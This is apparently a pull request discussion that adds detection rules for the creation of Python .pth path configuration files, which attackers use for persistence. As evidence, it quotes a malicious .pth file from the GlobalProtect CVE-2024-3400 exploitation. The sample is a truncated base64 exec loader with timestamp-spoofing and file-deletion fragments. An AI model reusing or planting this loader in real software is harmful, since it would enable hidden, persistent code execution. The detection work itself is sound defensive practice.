New analytic for python pth files

[netgrain]

Summary of the Pull Request

Adds hunting analytic to detect creation of Python path configuration file (.pth), which may be indicative of malicious activity such as backdoor creation and persistence.

According to specification:

An executable line in a .pth file is run at every Python startup, regardless of whether a particular module is actually going to be used. Its impact should thus be kept to a minimum.

Changelog

new: Python Path Configuration File Creation - Linux new: Python Path Configuration File Creation - Macos new: Python Path Configuration File Creation - Windows

Example Log Event

• https://www.virustotal.com/gui/file/3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac
• https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/

File content

import base64 exec(base64.b64decode(b"CgoKZGVmIGNoZWNrKCk6CiAgICBpbXBvcnQgb3Msc3VicHJvY2Vzcyx0aW1lLHN5cwoKCiAgICBkZWYgc3RhcnRfcHJvY2VzcygpOgogICAgICAgIGltcG9ydCBiYXNlNjQKICAgICAgICBmdW5jdGlvbmNvZGUgPSBiIlpHVm1JRjlmYldGcGJpZ3BPZzBLSUNBZ0lHbHRjRzl5ZENCMGFISmxZV1JwYm1jc2RHbHRaU3h2Y3l4eVpTeGlZWE5sTmpRTkNnMEtEUW9OQ2lBZ0lDQmtaV1lnY21WemRHOXlaU2hqYzNOZmNHRjBhQ3hqYjI1MFpXNTBMR0YwYVcxbExHMTBhVzFsS1RvTkNpQWdJQ0FnSUNBZ2FXMXdiM0owSUc5ekxIUnBiV1VOQ2lBZ0lDQWdJQ0FnZEdsdFpTNXpiR1ZsY0NneE5Ta05DaUFnSUNBZ0lDQWdkMmwwYUNCdmNHVnVLR056YzE5d1lYUm9MQ2QzSnlrZ1lYTWdaam9OQ2lBZ0lDQWdJQ0FnSUNBZ0lHWXVkM0pwZEdVb1kyOXVkR1Z1ZENrTkNpQWdJQ0FnSUNBZ2IzTXVkWFJwYldVb1kzTnpYM0JoZEdnc0tHRjBhVzFsTEcxMGFXMWxLU2tOQ2lBZ0lDQWdJQ0FnRFFvTkNpQWdJQ0FnSUNBZ0RRb2dJQ0FnWkdWbUlGOWZhWE5mZDJodmJHVmZhRzkxY2lncE9nMEtJQ0FnSUNBZ0lDQm1jbTl0SUdSaGRHVjBhVzFsSUdsdGNHOXlkQ0JrWVhSbGRHbHRaUTBLSUNBZ0lDQWdJQ0JqZFhKeVpXNTBYM1JwYldVZ1BTQmtZWFJsZEdsdFpTNXViM2NvS1M1MGFXMWxLQ2tOQ2lBZ0lDQWdJQ0FnY21WMGRYSnVJR04xY25KbGJuUmZkR2x0WlM1dGFXNTFkR1VnSVQwZ01DQmhibVFnWTNWeWNtVnVkRjkwYVcxbExuTmxZMjl1WkNBOVBT atime=os.path.getatime(os.file) mtime=os.path.getmtime(os.file) os.utime(systempth,(atime,mtime)) os.unlink(file) import glob os.unlink(glob.glob("/opt/pancfg/mgmt/licenses/PA_VM *")[0])

[nasbench]

@netgrain any particular reason you didn't create a windows and macos variant of this rule?

[netgrain]

@nasbench primarily as I've only seen exploitation of this technique on Linux-based systems, but added a Windows-variant now per new commit. Not sure if you'd want macos separately also? (macos is not in the folder-structure afaik).

Added "related: similar" as meta, but not sure if you'd want this considering product base is different?

Also: Some of the checks fails related to a known FP, which can be filtered, but not sure whether that specific event your checking for is an exception or a standard across your telemetry base

[nasbench]

@netgrain those FP are from a default installation of python. I excluded them with an additional FP found in test machines.

I updated the regex to include paths without versions and venv folder as both can exists and are able to load .pth files.